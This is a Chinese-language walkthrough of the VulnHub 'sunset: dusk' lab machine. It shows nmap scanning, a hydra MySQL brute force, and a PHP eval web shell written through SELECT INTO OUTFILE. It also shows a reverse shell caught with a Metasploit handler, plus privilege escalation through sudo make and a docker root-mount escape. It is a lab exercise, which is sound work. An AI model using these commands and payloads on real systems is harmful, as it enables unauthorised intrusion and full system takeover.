zoukankan      html  css  js  c++  java
  • sunset: dusk

    靶机地址:https://www.vulnhub.com/entry/sunset-dusk,404/

    扫描靶机IP:192.168.40.165

    nmap -sP 192.168.40.*

    扫描靶机端口,可以看到开放了很多端口

    nmap -sV -p- 192.168.40.165

    先访问80端口

    再看一下8080端口,给了当前目录下的文件和目录路径

    FTP匿名登录失败,不过靶机还开放了3306端口,尝试用远程登录mysql,不知道密码,先爆破

     hydra -l root -P /usr/share/wordlists/rockyou.txt -t 50 mysql://192.168.40.165

    mysql用户名为 root ,密码为 password ,远程登录mysql,没有找到有用的信息

    mysql -h 192.168.40.165 -uroot -ppassword

    查看有没有权限写马 , secure_file_priv 参数为空,不会限制mysqld 导入和导出文件,那么就可以在 /var/tmp/ 写马

     show variables like "%secure%";

    将一句话木马写入到 /var/tmp/shell.php

    select "<?php @eval($_POST['cmd']);?>" INTO OUTFILE "/var/tmp/shell.php";

     

    用蚁剑去连接写入的一句话木马(注意是8080端口)

     然后上传一个反弹shell的php脚本到靶机上

     

     在kali上用msf设置参数监听,再访问靶机 php-reverse-shell.php 的页面获取反弹shell

    use exploit/multi/handler
    set lhost 192.168.40.129
    set lport 1234
    run

     用python获取tty

    python -c 'import pty;pty.spawn("/bin/bash")'

    用 sudo -l 可以发现可以以 dusk 用户 执行 ping 、 make 、sl

    直接用 make 命令提权到 dusk  (这个网站收集了很多提权姿势)

    COMMAND='/bin/sh'
    sudo -u dusk  make -s --eval=$'x:
    	-'"$COMMAND"

    现在是 dusk 用户,同时发现 dusk 是 docker 组的

    直接用 docker 提权

    docker run -v /:/mnt  -it alpine

    获取flag

  • 相关阅读:
    HTML 标签
    HTML与CSS的关系
    用node搭建本地服务环境
    Windows平台下SVN安装配置及使用
    CSS Flex布局整理
    zepto 选中select option 的值
    Zepto tap 穿透bug、解决移动端点击穿透问题
    jquery 上下滚动显示隐藏
    es6学习笔记二:生成器 Generators
    es6学习笔记一:迭代器和for-of循环
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/13996428.html
Copyright © 2011-2022 走看看